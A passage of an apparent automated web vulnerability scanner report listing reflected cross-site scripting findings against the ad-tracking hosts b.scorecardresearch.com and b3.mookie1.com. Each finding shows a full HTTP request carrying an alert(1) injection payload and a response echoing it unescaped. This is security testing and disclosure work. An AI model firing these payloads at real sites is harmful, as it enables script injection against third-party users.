The value of the c2 request parameter is copied into a double-quoted JavaScript string literal in the COMSCORE.beacon({...}) call at the end of the beacon.js response, which is served as application/x-javascript. The payload 4cdef<script>alert(1)</script>6c54afd2076 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

As with 1.147, the payload contains no double quote, so it remains inside the string literal and the alert does not run when beacon.js is loaded as a script; the proof of concept demonstrates unencoded reflection into a script string context, and script execution depends either on a double quote also passing unescaped (not shown in the report) or on the body being rendered as HTML.

Request

GET /beacon.js?c1=2&c2=72903804cdef<script>alert(1)</script>6c54afd2076&c3=&c4=http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 05 Jul 2011 01:23:18 GMT
Date: Tue, 28 Jun 2011 01:23:18 GMT
Content-Length: 3688
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"72903804cdef<script>alert(1)</script>6c54afd2076", c3:"", c4:"http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



1.151. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 2a6bf<script>alert(1)</script>41b54ddb732 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=7290380&c3=2a6bf<script>alert(1)</script>41b54ddb732&c4=http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 05 Jul 2011 01:23:19 GMT
Date: Tue, 28 Jun 2011 01:23:19 GMT
Content-Length: 3688
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
ry{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"7290380", c3:"2a6bf<script>alert(1)</script>41b54ddb732", c4:"http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



1.152. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload f0bfd<script>alert(1)</script>66b34a2d166 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=7290380&c3=&c4=http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-marketf0bfd<script>alert(1)</script>66b34a2d166&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 05 Jul 2011 01:23:20 GMT
Date: Tue, 28 Jun 2011 01:23:20 GMT
Content-Length: 3688
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
h(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"7290380", c3:"", c4:"http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-marketf0bfd<script>alert(1)</script>66b34a2d166", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



1.153. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 8b9f7<script>alert(1)</script>a14dba9a415 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=7290380&c3=&c4=http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market&c5=8b9f7<script>alert(1)</script>a14dba9a415&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 05 Jul 2011 01:23:28 GMT
Date: Tue, 28 Jun 2011 01:23:28 GMT
Content-Length: 3688
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
eturn c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"7290380", c3:"", c4:"http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market", c5:"8b9f7<script>alert(1)</script>a14dba9a415", c6:"", c10:"", c15:"", c16:"", r:""});



1.154. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 32dd7<script>alert(1)</script>2aad8813a78 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=7290380&c3=&c4=http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market&c5=&c6=32dd7<script>alert(1)</script>2aad8813a78&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 05 Jul 2011 01:23:29 GMT
Date: Tue, 28 Jun 2011 01:23:29 GMT
Content-Length: 3688
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"7290380", c3:"", c4:"http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market", c5:"", c6:"32dd7<script>alert(1)</script>2aad8813a78", c10:"", c15:"", c16:"", r:""});



1.155. http://b3.mookie1.com/2/TRACK_Xaxis/1028646844@x54 [&_RM_HTML_url_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1028646844@x54

Issue detail

The value of the &_RM_HTML_url_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37bf9'-alert(1)-'8e97064860d was submitted in the &_RM_HTML_url_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1028646844@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers/view/account-manager37bf9'-alert(1)-'8e97064860d&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers&Section=Careers&Page=PositionPosting HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers/view/account-manager
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206357

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:22 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2119
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
equest and does not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers/view/account-manager37bf9'-alert(1)-'8e97064860d&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers&Section=Careers&Page=PositionPosting';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
va
...[SNIP]...

1.156. http://b3.mookie1.com/2/TRACK_Xaxis/1028646844@x54 [Page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1028646844@x54

Issue detail

The value of the Page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b7a2'-alert(1)-'0f7f7c6816f was submitted in the Page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1028646844@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers&Section=Careers&Page=PositionPosting8b7a2'-alert(1)-'0f7f7c6816f HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers/view/account-manager
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206357

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2119
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
ML_url_=http%3A//www.xaxis.com/uk/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers&Section=Careers&Page=PositionPosting8b7a2'-alert(1)-'0f7f7c6816f';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=''
...[SNIP]...

1.157. http://b3.mookie1.com/2/TRACK_Xaxis/1028646844@x54 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1028646844@x54

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8d21"><script>alert(1)</script>0dcec04e695 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxisc8d21"><script>alert(1)</script>0dcec04e695/1028646844@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers&Section=Careers&Page=PositionPosting HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers/view/account-manager
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206357

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:45 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxisc8d21"><script>alert(1)</script>0dcec04e695/340321756/x54/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.158. http://b3.mookie1.com/2/TRACK_Xaxis/1028646844@x54 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1028646844@x54

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27c01"><script>alert(1)</script>4430bdc2267 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxis/1028646844@x5427c01"><script>alert(1)</script>4430bdc2267?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers&Section=Careers&Page=PositionPosting HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers/view/account-manager
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206357

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:47 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 323
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxis/2063926244/x5427c01"><script>alert(1)</script>4430bdc2267/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.159. http://b3.mookie1.com/2/TRACK_Xaxis/1028646844@x54 [Section parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1028646844@x54

Issue detail

The value of the Section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbf9b'-alert(1)-'81c30b8b7db was submitted in the Section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1028646844@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers&Section=Careersdbf9b'-alert(1)-'81c30b8b7db&Page=PositionPosting HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers/view/account-manager
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206357

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2119
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers&Section=Careersdbf9b'-alert(1)-'81c30b8b7db&Page=PositionPosting';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsec
...[SNIP]...

1.160. http://b3.mookie1.com/2/TRACK_Xaxis/1028646844@x54 [_RM_HTML_referer_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1028646844@x54

Issue detail

The value of the _RM_HTML_referer_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a1a8'-alert(1)-'959930afff9 was submitted in the _RM_HTML_referer_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1028646844@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers7a1a8'-alert(1)-'959930afff9&Section=Careers&Page=PositionPosting HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers/view/account-manager
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206357

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:31 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2119
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...

}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers7a1a8'-alert(1)-'959930afff9&Section=Careers&Page=PositionPosting';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section
...[SNIP]...

1.161. http://b3.mookie1.com/2/TRACK_Xaxis/1028646844@x54 [_RM_HTML_title_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1028646844@x54

Issue detail

The value of the _RM_HTML_title_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ebf19'-alert(1)-'0caea78f5e8 was submitted in the _RM_HTML_title_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1028646844@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20Yorkebf19'-alert(1)-'0caea78f5e8&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers&Section=Careers&Page=PositionPosting HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers/view/account-manager
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206357

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:26 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2175
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
*/
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20Yorkebf19'-alert(1)-'0caea78f5e8&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers&Section=Careers&Page=PositionPosting';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=
...[SNIP]...

1.162. http://b3.mookie1.com/2/TRACK_Xaxis/1028646844@x54 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1028646844@x54

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76078'-alert(1)-'c928e37433f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1028646844@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers&Section=Careers&Page=PositionPosting&76078'-alert(1)-'c928e37433f=1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
